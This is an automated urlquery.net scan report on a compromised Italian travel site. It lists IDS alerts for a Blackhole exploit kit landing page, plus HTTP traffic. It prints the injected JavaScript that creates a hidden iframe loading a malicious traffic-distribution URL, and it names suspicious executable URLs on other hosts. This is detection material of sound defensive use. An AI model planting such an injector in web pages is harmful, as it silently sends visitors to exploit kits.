urlquery.net - Free url scanner

Overview

URL	http://www.italiatop.es/
IP	62.149.132.107
ASN	AS31034 Aruba S.p.A.
Location	Italy
Report completed	2012-11-09 19:53:00 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-09 19:52:26	207.176.7.94	urlQuery Client	3	ET RBN Known Russian Business Network IP (125)
2012-11-09 19:52:29	207.176.7.94	urlQuery Client	3	FILEMAGIC Macromedia Flash data (compressed),

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-09 19:52:26	62.149.132.107	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 62.149.132.107

Date	Alerts / IDS	URL	IP
2013-03-13 04:19:27	1 / 1	http://www.siemelettrica.com/index.html	62.149.132.107
2013-03-12 13:25:03	1 / 1	http://www.siemelettrica.com/index.html	62.149.132.107
2013-03-12 00:11:16	1 / 2	http://www.siemelettrica.com/index.html	62.149.132.107
2013-01-02 15:19:15	2 / 0	http://www.italiatop.es/wordpress/?page_id=56	62.149.132.107
2013-01-02 09:04:48	1 / 0	http://www.italiatop.es/wordpress?p=8	62.149.132.107
2013-01-02 07:05:25	1 / 0	http://www.italiatop.es/wordpress?cat=4	62.149.132.107

Last 6 reports on ASN: AS31034 Aruba S.p.A.

Date	Alerts / IDS	URL	IP
2013-03-30 07:27:50	0 / 2	http://lnx.indajaus.com/acidjazzhispano/FCKeditor/fckeditor.js	62.149.140.56
2013-03-30 07:06:35	0 / 1	http://www.infolabsrl.it/coge7/setupcoge7.exe	62.149.130.153
2013-03-30 01:33:47	0 / 1	http://www.eleonuccorini.com/images/logos.gif?1c56c=928608	62.149.131.133
2013-03-30 01:33:44	0 / 1	http://www.eleonuccorini.com/images/logos.gif?22738=1411120	62.149.131.133
2013-03-30 00:43:04	0 / 1	http://primoweb.it/components/com_user/views/in.exe	85.235.157.111
2013-03-30 00:41:00	0 / 2	http://www.infolabsrl.it/coge7/setupcoge7.exe	62.149.130.153

Last 6 reports on domain: www.italiatop.es

Date	Alerts / IDS	URL	IP
2013-01-02 15:19:15	2 / 0	http://www.italiatop.es/wordpress/?page_id=56	62.149.132.107
2013-01-02 09:04:48	1 / 0	http://www.italiatop.es/wordpress?p=8	62.149.132.107
2013-01-02 07:05:25	1 / 0	http://www.italiatop.es/wordpress?cat=4	62.149.132.107
2013-01-02 03:51:05	1 / 0	http://www.italiatop.es/wordpress?page_id=12	62.149.132.107
2013-01-02 01:31:16	1 / 0	http://www.italiatop.es/wordpress?p=8	62.149.132.107
2013-01-01 16:48:05	1 / 0	http://www.italiatop.es/wordpress?page_id=12	62.149.132.107

JavaScript

Executed Scripts (9)

Executed Evals (2)

#1 JavaScript::Eval (size: 649, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://supportgoglstatisticonlinefraud.in/tds/index.php?out=1336940621' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://supportgoglstatisticonlinefraud.in/tds/index.php?out=1336940621');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 20, repeated: 1)

window.location.href

Executed Writes (1)

#1 JavaScript::Write (size: 117, repeated: 1)

<script type='text/javascript' src='http://statse.webtrendslive.com/dcssg78xo10000k38w7aorh4j_8q1n/wtid.js'></script>

HTTP Transactions (21)

Request	Response
GET / HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Content-Encoding: gzip Last-Modified: Mon, 14 May 2012 04:42:43 GMT Accept-Ranges: bytes Etag: "1569a508c31cd1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:24 GMT Content-Length: 3440
GET /nuovibanner/nuovibanner/sagrata%20famiglia.jpg HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: image/jpeg Last-Modified: Sun, 01 Apr 2012 15:59:17 GMT Accept-Ranges: bytes Etag: "6484d642010cd1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:24 GMT Content-Length: 52442
GET /nuovibanner/nuovibanner/bahia-de-algeciras.jpg HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: image/jpeg Last-Modified: Sun, 01 Apr 2012 15:59:07 GMT Accept-Ranges: bytes Etag: "facb995e2010cd1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:24 GMT Content-Length: 49031
GET /nuovibanner/nuovibanner/logo2.png HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Wed, 07 Dec 2011 14:18:01 GMT Accept-Ranges: bytes Etag: "dd5cc6ebb4cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:24 GMT Content-Length: 130630
GET /nuovibanner/nuovibanner/logo1.png HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Wed, 07 Dec 2011 14:17:55 GMT Accept-Ranges: bytes Etag: "3d2f963ebb4cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:24 GMT Content-Length: 156924
GET /swfobject.js HTTP/1.1 Host: weatherandtime.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: application/javascript Server: nginx/1.2.2 Date: Fri, 09 Nov 2012 18:52:26 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Last-Modified: Fri, 11 Mar 2011 10:21:33 GMT Etag: "24ed897-638a-49e32537b8540" Content-Encoding: gzip
GET /box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E HTTP/1.1 Host: www.ilmeteo.it GET /box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: text/html Server: Apache/2 Vary: Accept-Encoding Content-Encoding: gzip Set-Cookie: ilmeteo.it=1; X-Cacheable: YES Content-Length: 1251 Date: Fri, 09 Nov 2012 18:52:27 GMT X-Varnish: 1868053714 Age: 0 Via: 1.1 varnish Connection: keep-alive X-FE: 7
GET /box/ico1/w101.png HTTP/1.1 Host: www.ilmeteo.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ilmeteo.it/box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E Cookie: ilmeteo.it=1	HTTP/1.1 200 OK Content-Type: image/png Server: Apache/2 Last-Modified: Wed, 24 Feb 2010 18:00:01 GMT Etag: "f6997-e26-4805c6f65f9a6" X-Cacheable: YES Content-Length: 3622 Date: Fri, 09 Nov 2012 18:52:28 GMT X-Varnish: 1868054087 1867831969 Age: 450 Via: 1.1 varnish Connection: keep-alive X-Cache: HIT X-Cache-Hits: 46 X-FE: 7
GET /wt.js HTTP/1.1 Host: www.ilmeteo.it User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ilmeteo.it/box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E	HTTP/1.1 200 OK Content-Type: application/javascript Server: Apache/2 Last-Modified: Fri, 17 Jun 2011 01:27:43 GMT Etag: "6d2ee-2fc6-4a5de4ad9d9d4" Cache-Control: max-age=691200 Expires: Sat, 17 Nov 2012 18:52:27 GMT Vary: Accept-Encoding Content-Encoding: gzip Set-Cookie: ilmeteo.it=1; X-Cacheable: YES Content-Length: 4024 Date: Fri, 09 Nov 2012 18:52:27 GMT X-Varnish: 974456312 Age: 0 Via: 1.1 varnish Connection: keep-alive X-FE: 4
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 31 Oct 2012 21:22:10 GMT Etag: "87de33-256-4cd617ed12480" Accept-Ranges: bytes Content-Length: 598 Date: Fri, 09 Nov 2012 18:52:28 GMT Connection: keep-alive
GET /dcssg78xo10000k38w7aorh4j_8q1n/dcs.gif?&dcsdat=1352487148299&dcssip=www.ilmeteo.it&dcsuri=/box/previsioni.php&dcsqry=%3Fcitta=8146%26type=real1%26width=200%26ico=1%26lang=ita%26days=6%26font=Tahoma%26fontsize=12%26bg=209124%26fg=000000%26bgtitle=268F15%26fgtitle=FFFFFF%26bgtab=52F03A%26fglink=051B2E&dcsref=http://www.italiatop.es/&WT.co_f=21538da09c86a2a2c8e1352487148301&WT.vt_sid=21538da09c86a2a2c8e1352487148301.1352487148301&WT.vt_f_tlv=0&WT.tz=1&WT.bh=19&WT.ul=en-US&WT.cd=24&WT.sr=1176x885&WT.jo=Yes&WT.ti=IL%20METEO%20-%20La%20Valletta&WT.js=Yes&WT.jv=1.8&WT.ct=unknown&WT.bs=300x150&WT.fi=Yes&WT.fv=10.0&WT.tv=1.1.0&WT.dl=0&WT.es=www.ilmeteo.it/box/previsioni.php&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 Host: statse.webtrendslive.com GET /dcssg78xo10000k38w7aorh4j_8q1n/dcs.gif?&dcsdat=1352487148299&dcssip=www.ilmeteo.it&dcsuri=/box/previsioni.php&dcsqry=%3Fcitta=8146%26type=real1%26width=200%26ico=1%26lang=ita%26days=6%26font=Tahoma%26fontsize=12%26bg=209124%26fg=000000%26bgtitle=268F15%26fgtitle=FFFFFF%26bgtab=52F03A%26fglink=051B2E&dcsref=http://www.italiatop.es/&WT.co_f=21538da09c86a2a2c8e1352487148301&WT.vt_sid=21538da09c86a2a2c8e1352487148301.1352487148301&WT.vt_f_tlv=0&WT.tz=1&WT.bh=19&WT.ul=en-US&WT.cd=24&WT.sr=1176x885&WT.jo=Yes&WT.ti=IL%20METEO%20-%20La%20Valletta&WT.js=Yes&WT.jv=1.8&WT.ct=unknown&WT.bs=300x150&WT.fi=Yes&WT.fv=10.0&WT.tv=1.1.0&WT.dl=0&WT.es=www.ilmeteo.it/box/previsioni.php&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ilmeteo.it/box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E Cookie: ACOOKIE=C8ctADYyLjI0OS4xNzguMjAwLTMwMjQyMTY4NjQuMzAyNTU5MTYAAAAAAAABAAAAm/IAADa1fFAItXxQAQAAAK1OAAA2tXxQCLV8UAAAAAA-	HTTP/1.1 303 Object Moved HTTP/1.1 303 Object Moved Connection: close Date: Fri, 09 Nov 2012 18:52:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcssg78xo10000k38w7aorh4j_8q1n/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1352487148299&dcssip=www.ilmeteo.it&dcsuri=/box/previsioni.php&dcsqry=%3Fcitta=8146%26type=real1%26width=200%26ico=1%26lang=ita%26days=6%26font=Tahoma%26fontsize=12%26bg=209124%26fg=000000%26bgtitle=268F15%26fgtitle=FFFFFF%26bgtab=52F03A%26fglink=051B2E&dcsref=http://www.italiatop.es/&WT.co_f=21538da09c86a2a2c8e1352487148301&WT.vt_sid=21538da09c86a2a2c8e1352487148301.1352487148301&WT.vt_f_tlv=0&WT.tz=1&WT.bh=19&WT.ul=en-US&WT.cd=24&WT.sr=1176x885&WT.jo=Yes&WT.ti=IL%20METEO%20-%20La%20Valletta&WT.js=Yes&WT.jv=1.8&WT.ct=unknown&WT.bs=300x150&WT.fi=Yes&WT.fv=10.0&WT.tv=1.1.0&WT.dl=0&WT.es=www.ilmeteo.it/box/previsioni.php&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADYyLjI0OS4xNzguMjAwLTMwMjQyMTY4NjQuMzAyNTU5MTYAAAAAAAACAAAAm/IAADa1fFAItXxQZM8AAOxQnVDsUJ1QAgAAAK1OAAA2tXxQCLV8UBRLAADsUJ1Q7FCdUAAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
GET /dcssg78xo10000k38w7aorh4j_8q1n/wtid.js HTTP/1.1 Host: statse.webtrendslive.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ilmeteo.it/box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E Cookie: ACOOKIE=C8ctADYyLjI0OS4xNzguMjAwLTMwMjQyMTY4NjQuMzAyNTU5MTYAAAAAAAABAAAAm/IAADa1fFAItXxQAQAAAK1OAAA2tXxQCLV8UAAAAAA-	HTTP/1.1 200 Ok Content-Type: application/x-javascript Connection: close Date: Fri, 09 Nov 2012 18:52:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 66 Pragma: no-cache Expires: -1 Cache-Control: no-cache
GET /pub/swz/crossdomain.xml HTTP/1.1 Host: fpdownload.adobe.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/x-cross-domain-policy Server: Apache Last-Modified: Wed, 08 Apr 2009 14:45:28 GMT Etag: "12bcfe-d1-4670c2eb93200" Accept-Ranges: bytes Content-Length: 209 Date: Fri, 09 Nov 2012 18:52:28 GMT Connection: keep-alive
GET /dcssg78xo10000k38w7aorh4j_8q1n/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1352487148299&dcssip=www.ilmeteo.it&dcsuri=/box/previsioni.php&dcsqry=%3Fcitta=8146%26type=real1%26width=200%26ico=1%26lang=ita%26days=6%26font=Tahoma%26fontsize=12%26bg=209124%26fg=000000%26bgtitle=268F15%26fgtitle=FFFFFF%26bgtab=52F03A%26fglink=051B2E&dcsref=http://www.italiatop.es/&WT.co_f=21538da09c86a2a2c8e1352487148301&WT.vt_sid=21538da09c86a2a2c8e1352487148301.1352487148301&WT.vt_f_tlv=0&WT.tz=1&WT.bh=19&WT.ul=en-US&WT.cd=24&WT.sr=1176x885&WT.jo=Yes&WT.ti=IL%20METEO%20-%20La%20Valletta&WT.js=Yes&WT.jv=1.8&WT.ct=unknown&WT.bs=300x150&WT.fi=Yes&WT.fv=10.0&WT.tv=1.1.0&WT.dl=0&WT.es=www.ilmeteo.it/box/previsioni.php&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 Host: statse.webtrendslive.com GET /dcssg78xo10000k38w7aorh4j_8q1n/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1352487148299&dcssip=www.ilmeteo.it&dcsuri=/box/previsioni.php&dcsqry=%3Fcitta=8146%26type=real1%26width=200%26ico=1%26lang=ita%26days=6%26font=Tahoma%26fontsize=12%26bg=209124%26fg=000000%26bgtitle=268F15%26fgtitle=FFFFFF%26bgtab=52F03A%26fglink=051B2E&dcsref=http://www.italiatop.es/&WT.co_f=21538da09c86a2a2c8e1352487148301&WT.vt_sid=21538da09c86a2a2c8e1352487148301.1352487148301&WT.vt_f_tlv=0&WT.tz=1&WT.bh=19&WT.ul=en-US&WT.cd=24&WT.sr=1176x885&WT.jo=Yes&WT.ti=IL%20METEO%20-%20La%20Valletta&WT.js=Yes&WT.jv=1.8&WT.ct=unknown&WT.bs=300x150&WT.fi=Yes&WT.fv=10.0&WT.tv=1.1.0&WT.dl=0&WT.es=www.ilmeteo.it/box/previsioni.php&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.ilmeteo.it/box/previsioni.php?citta=8146&type=real1&width=200&ico=1&lang=ita&days=6&font=Tahoma&fontsize=12&bg=209124&fg=000000&bgtitle=268F15&fgtitle=FFFFFF&bgtab=52F03A&fglink=051B2E Cookie: ACOOKIE=C8ctADYyLjI0OS4xNzguMjAwLTMwMjQyMTY4NjQuMzAyNTU5MTYAAAAAAAACAAAAm/IAADa1fFAItXxQZM8AAOxQnVDsUJ1QAgAAAK1OAAA2tXxQCLV8UBRLAADsUJ1Q7FCdUAAAAAA-	HTTP/1.1 200 OK Content-Type: image/gif Connection: close Date: Fri, 09 Nov 2012 18:52:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADYyLjI0OS4xNzguMjAwLTMwMjQyMTY4NjQuMzAyNTU5MTYAAAAAAAACAAAAm/IAADa1fFAItXxQZM8AAOxQnVDsUJ1QAgAAAK1OAAA2tXxQCLV8UBRLAADsUJ1Q7FCdUAAAAAA-; path=/; expires=Sun, 09-Nov-2014 18:52:28 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-Length: 67
GET /crossdomain.xml HTTP/1.1 Host: fpdownload.adobe.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/x-cross-domain-policy Server: Apache Last-Modified: Mon, 04 May 2009 20:29:46 GMT Etag: "69c8bb-8d-4691c05e90280" Accept-Ranges: bytes Content-Length: 141 Date: Fri, 09 Nov 2012 18:52:28 GMT Connection: keep-alive
GET /pub/swz/tlf/1.0.0.595/textLayout_1.0.0.595.swz HTTP/1.1 Host: fpdownload.adobe.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/plain Server: Apache Last-Modified: Mon, 01 Feb 2010 22:11:34 GMT Etag: "86e38e-26294-44a71180" Accept-Ranges: bytes Content-Length: 156308 Date: Fri, 09 Nov 2012 18:52:28 GMT Connection: keep-alive
GET /weather_05.swf HTTP/1.1 Host: weatherandtime.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/1.2.2 Date: Fri, 09 Nov 2012 18:52:28 GMT Content-Length: 336912 Connection: keep-alive Keep-Alive: timeout=15 Last-Modified: Fri, 08 Apr 2011 10:51:14 GMT Etag: "24e89b9-52410-4a0660131ec80" Accept-Ranges: bytes
GET /weatherdata.xml?city=14322&lang=en&domain=www.italiatop.es&path=&ref=http%3A//www.italiatop.es/&number=05 HTTP/1.1 Host: weatherandtime.net GET /weatherdata.xml?city=14322&lang=en&domain=www.italiatop.es&path=&ref=http%3A//www.italiatop.es/&number=05 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Server: nginx/1.2.2 Date: Fri, 09 Nov 2012 18:52:30 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 X-Powered-By: PHP/5.3.8 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Content-Encoding: gzip
GET /favicon.ico HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: private Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:30 GMT Content-Length: 5351
GET /favicon.ico HTTP/1.1 Host: www.italiatop.es User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: private Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Nov 2012 18:52:28 GMT Content-Length: 5351
GET /tds/index.php?out=1336940621 HTTP/1.1 Host: supportgoglstatisticonlinefraud.in User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.italiatop.es/